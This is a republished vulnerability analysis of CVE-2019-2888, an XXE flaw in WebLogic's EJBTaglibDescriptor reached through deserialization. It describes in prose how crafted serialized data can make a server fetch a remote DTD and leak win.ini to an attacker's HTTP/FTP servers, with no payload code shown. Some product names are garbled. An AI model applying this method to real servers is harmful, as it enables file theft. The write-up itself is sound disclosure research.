Analysis of WebLogic EJBTaglibDescriptor XXE vulnerabilities (CVE-2019-2888) 02/24 Update SLTechnology News&Howtos

Analysis of WebLogic EJBTaglibDescriptor XXE vulnerabilities (CVE-2019-2888)

2025-02-24 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

Author: Longofo@ ZhiChuangyu 404 Laboratory

Date: October 16, 2019

Original link: https://paper.seebug.org/1067/

This vulnerability is similar to several XXE vulnerabilities submitted by @Matthias Kaiser before, and EJBTaglibDescriptor should be one of the missing ones, please refer to the analysis of several XXE before. Master @Badcode and I decompiled all the Jar packages of LOGY, searched and matched this EJBTaglibDescriptor class according to the characteristics of several XXE vulnerabilities before, and this class will also perform XML parsing when deserializing.

Oracle released October patches, see link for details ( https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html)

Environment Windows 10 LOGY 10.3.6.0.190716(July 19 patch installed)Jdk160_29 (JDK included with LOGY) Vulnerability Analysis

weblogic.jar!\ weblogic\servlet\ejb2jsp\dd\EJBTaglibDescriptor.class This class inherits from java\io\Externalizable

Therefore, writeExternal and readExternal are automatically invoked when serializing and deserializing

Look at the logic of writeExternal vs. readExternal

In readExternal, String data in deserialized data is read using ObjectIuput.readUTF, and then the load method is called,

In the load method, DocumentBuilder.parse is used to parse the XML data passed in deserialization, so here is a possible XXE vulnerability

In writeExternal, its own toString method is called, which in turn calls its own toXML method

The toXML function should be to convert this.beans into the corresponding xml data. It may seem like a bit of a hassle to construct payloads, but serialization is something an attacker can control, so we can modify writeExternal's logic directly to generate malicious serialized data:

bug recurrence

1. Rewrite the writeExternal function in EJBTaglibDescriptor to generate payload

Send payload to server

We received requests for my.dtd and win.ini data on our HTTP and FTP servers.

3. Error messages can be seen on servers that have been patched in July.

Reference link:

[1]Analysis: https://paper.seebug.org/906/

[2] https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html

Please indicate the source if you need to reprint.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.